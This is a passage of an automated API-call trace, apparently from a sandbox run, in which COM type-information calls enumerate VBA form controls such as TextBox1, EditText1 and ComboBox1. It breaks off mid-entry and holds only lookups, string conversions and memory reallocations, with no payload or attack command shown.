ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x52, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x53, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x54, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x55, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x56, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x57, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x58, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x59, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x5a, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x5b, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x5c, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x5d, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x5e, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x5f, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x60, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x61, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x62, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x63, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.957] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x64, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.957] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.957] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2002, refPtrFlags=0x1847b8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1847c0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1847c0*="") returned 0x0 [0041.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Text1", cchWideChar=6, lpMultiByteStr=0x184670, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Text1", lpUsedDefaultChar=0x0) returned 6 [0041.957] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text1") returned 0x107eb3 [0041.957] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x5000025, ppTInfo=0x184790 | out: ppTInfo=0x184790*=0x6ceee08) returned 0x0 [0041.957] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x1846f0, pDummy=0x24a | out: ppTypeAttr=0x1846f0, pDummy=0x24a) returned 0x0 [0041.957] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0041.957] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x0, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=1) returned 0x0 [0041.957] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x0, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2200) returned 0x0 [0041.957] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2200, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6ceee60) returned 0x0 [0041.957] IUnknown:Release (This=0x6ceee60) returned 0x0 [0041.957] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x1, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=3) returned 0x0 [0041.957] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x1, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2a00) returned 0x0 [0041.957] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2a00, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6ceefc0) returned 0x0 [0041.957] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184610 | out: ppvObject=0x184610*=0x0) returned 0x80004002 [0041.957] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x184638, pDummy=0x10 | out: ppTypeAttr=0x184638, pDummy=0x10) returned 0x0 [0041.957] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.957] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c13fb0, cb=0x62) returned 0x6c6b8b0 [0041.957] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x65, ppFuncDesc=0x184778, pDummy=0x30 | out: ppFuncDesc=0x184778, pDummy=0x30) returned 0x0 [0041.957] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.957] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2003, refPtrFlags=0x1847b8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TextBox1", cchWideChar=9, lpMultiByteStr=0x184670, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TextBox1", lpUsedDefaultChar=0x0) returned 9 [0041.957] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TextBox1") returned 0x1053a6 [0041.957] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x5000025, ppTInfo=0x184790 | out: ppTInfo=0x184790*=0x6ceee08) returned 0x0 [0041.957] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x1846f0, pDummy=0x28a | out: ppTypeAttr=0x1846f0, pDummy=0x28a) returned 0x0 [0041.957] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0041.957] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x0, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=1) returned 0x0 [0041.958] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x0, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2200) returned 0x0 [0041.958] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2200, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6ceee60) returned 0x0 [0041.958] IUnknown:Release (This=0x6ceee60) returned 0x0 [0041.958] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x1, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=3) returned 0x0 [0041.958] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x1, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2a00) returned 0x0 [0041.958] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2a00, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6ceefc0) returned 0x0 [0041.958] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184610 | out: ppvObject=0x184610*=0x0) returned 0x80004002 [0041.958] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x184638, pDummy=0x10 | out: ppTypeAttr=0x184638, pDummy=0x10) returned 0x0 [0041.958] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.958] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c6b8b0, cb=0xc2) returned 0x6c2d710 [0041.958] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x66, ppFuncDesc=0x184778, pDummy=0x60 | out: ppFuncDesc=0x184778, pDummy=0x60) returned 0x0 [0041.958] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.958] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2004, refPtrFlags=0x1847b8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EditText1", cchWideChar=10, lpMultiByteStr=0x184670, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EditText1", lpUsedDefaultChar=0x0) returned 10 [0041.958] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EditText1") returned 0x1097ee [0041.958] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x5000025, ppTInfo=0x184790 | out: ppTInfo=0x184790*=0x6ceee08) returned 0x0 [0041.958] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x1846f0, pDummy=0x290 | out: ppTypeAttr=0x1846f0, pDummy=0x290) returned 0x0 [0041.958] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0041.958] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x0, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=1) returned 0x0 [0041.958] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x0, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2200) returned 0x0 [0041.958] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2200, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6ceee60) returned 0x0 [0041.958] IUnknown:Release (This=0x6ceee60) returned 0x0 [0041.958] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x1, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=3) returned 0x0 [0041.958] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x1, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2a00) returned 0x0 [0041.958] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2a00, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6ceefc0) returned 0x0 [0041.959] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184610 | out: ppvObject=0x184610*=0x0) returned 0x80004002 [0041.959] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x184638, pDummy=0x10 | out: ppTypeAttr=0x184638, pDummy=0x10) returned 0x0 [0041.959] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.959] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c2d710, cb=0xf2) returned 0x6c1ebb0 [0041.959] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x67, ppFuncDesc=0x184778, pDummy=0x78 | out: ppFuncDesc=0x184778, pDummy=0x78) returned 0x0 [0041.959] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.959] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2005, refPtrFlags=0x1847b8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ValidText", cchWideChar=10, lpMultiByteStr=0x184670, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ValidText", lpUsedDefaultChar=0x0) returned 10 [0041.959] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ValidText") returned 0x10229c [0041.959] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x5000025, ppTInfo=0x184790 | out: ppTInfo=0x184790*=0x6ceee08) returned 0x0 [0041.959] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x1846f0, pDummy=0x23c | out: ppTypeAttr=0x1846f0, pDummy=0x23c) returned 0x0 [0041.959] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0041.959] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x0, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=1) returned 0x0 [0041.959] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x0, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2200) returned 0x0 [0041.959] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2200, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6ceee60) returned 0x0 [0041.959] IUnknown:Release (This=0x6ceee60) returned 0x0 [0041.959] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x1, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=3) returned 0x0 [0041.959] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x1, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2a00) returned 0x0 [0041.959] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2a00, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6ceefc0) returned 0x0 [0041.959] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184610 | out: ppvObject=0x184610*=0x0) returned 0x80004002 [0041.959] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x184638, pDummy=0x10 | out: ppTypeAttr=0x184638, pDummy=0x10) returned 0x0 [0041.959] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.959] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c1ebb0, cb=0x152) returned 0x6d22a80 [0041.959] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x68, ppFuncDesc=0x184778, pDummy=0xa8 | out: ppFuncDesc=0x184778, pDummy=0xa8) returned 0x0 [0041.959] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.959] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2008, refPtrFlags=0x1847b8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="date1", cchWideChar=6, lpMultiByteStr=0x184670, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="date1", lpUsedDefaultChar=0x0) returned 6 [0041.959] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="date1") returned 0x1031d4 [0041.959] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x5000025, ppTInfo=0x184790 | out: ppTInfo=0x184790*=0x6ceee08) returned 0x0 [0041.959] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x1846f0, pDummy=0x28e | out: ppTypeAttr=0x1846f0, pDummy=0x28e) returned 0x0 [0041.959] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0041.960] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x0, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=1) returned 0x0 [0041.960] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x0, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2200) returned 0x0 [0041.960] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2200, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6ceee60) returned 0x0 [0041.960] IUnknown:Release (This=0x6ceee60) returned 0x0 [0041.960] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x1, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=3) returned 0x0 [0041.960] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x1, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2a00) returned 0x0 [0041.960] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2a00, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6ceefc0) returned 0x0 [0041.960] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184610 | out: ppvObject=0x184610*=0x0) returned 0x80004002 [0041.960] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x184638, pDummy=0x10 | out: ppTypeAttr=0x184638, pDummy=0x10) returned 0x0 [0041.960] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.960] IMalloc:Realloc (This=0x7feffc15380, pv=0x6d22a80, cb=0x182) returned 0x6cb0790 [0041.960] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x69, ppFuncDesc=0x184778, pDummy=0xc0 | out: ppFuncDesc=0x184778, pDummy=0xc0) returned 0x0 [0041.960] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.960] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2009, refPtrFlags=0x1847b8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TextBox2", cchWideChar=9, lpMultiByteStr=0x184670, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TextBox2", lpUsedDefaultChar=0x0) returned 9 [0041.960] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TextBox2") returned 0x1053a7 [0041.960] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x5000025, ppTInfo=0x184790 | out: ppTInfo=0x184790*=0x6ceee08) returned 0x0 [0041.960] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x1846f0, pDummy=0x2a6 | out: ppTypeAttr=0x1846f0, pDummy=0x2a6) returned 0x0 [0041.960] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0041.960] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x0, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=1) returned 0x0 [0041.960] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x0, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2200) returned 0x0 [0041.960] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2200, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6ceee60) returned 0x0 [0041.960] IUnknown:Release (This=0x6ceee60) returned 0x0 [0041.960] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x1, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=3) returned 0x0 [0041.960] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x1, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2a00) returned 0x0 [0041.960] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2a00, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6ceefc0) returned 0x0 [0041.960] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184610 | out: ppvObject=0x184610*=0x0) returned 0x80004002 [0041.960] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x184638, pDummy=0x10 | out: ppTypeAttr=0x184638, pDummy=0x10) returned 0x0 [0041.960] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.960] IMalloc:Realloc (This=0x7feffc15380, pv=0x6cb0790, cb=0x1e2) returned 0x6ae77d0 [0041.960] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x6a, ppFuncDesc=0x184778, pDummy=0xf0 | out: ppFuncDesc=0x184778, pDummy=0xf0) returned 0x0 [0041.960] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.961] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2010, refPtrFlags=0x1847b8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComboBox1", cchWideChar=10, lpMultiByteStr=0x184670, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComboBox1", lpUsedDefaultChar=0x0) returned 10 [0041.961] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ComboBox1") returned 0x10d827 [0041.961] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x5000031, ppTInfo=0x184790 | out: ppTInfo=0x184790*=0x6cef018) returned 0x0 [0041.961] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef018, ppTypeAttr=0x1846f0, pDummy=0x2a8 | out: ppTypeAttr=0x1846f0, pDummy=0x2a8) returned 0x0 [0041.961] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef018) returned 0x0 [0041.961] ITypeInfo:GetImplTypeFlags (in: This=0x6cef018, index=0x0, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=1) returned 0x0 [0041.961] ITypeInfo:GetRefTypeOfImplType (in: This=0x6cef018, index=0x0, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2300) returned 0x0 [0041.961] ITypeInfo:GetRefTypeInfo (in: This=0x6cef018, hreftype=0x2300, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6cef070) returned 0x0 [0041.961] IUnknown:Release (This=0x6cef070) returned 0x0 [0041.961] ITypeInfo:GetImplTypeFlags (in: This=0x6cef018, index=0x1, pImplTypeFlags=0x1846d8 | out: pImplTypeFlags=0x1846d8*=3) returned 0x0 [0041.961] ITypeInfo:GetRefTypeOfImplType (in: This=0x6cef018, index=0x1, pRefType=0x1846e0 | out: pRefType=0x1846e0*=0x2c00) returned 0x0 [0041.961] ITypeInfo:GetRefTypeInfo (in: This=0x6cef018, hreftype=0x2c00, ppTInfo=0x1846e8 | out: ppTInfo=0x1846e8*=0x6cef120) returned 0x0 [0041.961] IUnknown:QueryInterface (in: This=0x6cef120, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184610 | out: ppvObject=0x184610*=0x0) returned 0x80004002 [0041.961] ITypeInfo:RemoteGetTypeAttr (in: This=0x6cef120, ppTypeAttr=0x184638, pDummy=0x10 | out: ppTypeAttr=0x184638, pDummy=0x10) returned 0x0 [0041.961] ITypeInfo:LocalReleaseTypeAttr (This=0x6cef120) returned 0x0 [0041.961] IMalloc:Realloc (This=0x7feffc15380, pv=0x6ae77d0, cb=0x212) returned 0x6d10430 [0041.961] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x6b, ppFuncDesc=0x184778, pDummy=0x108 | out: ppFuncDesc=0x184778, pDummy=0x108) returned 0x0 [0041.961] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.961] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2011, refPtrFlags=0x1847b8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.961] WideCharToMultiByte 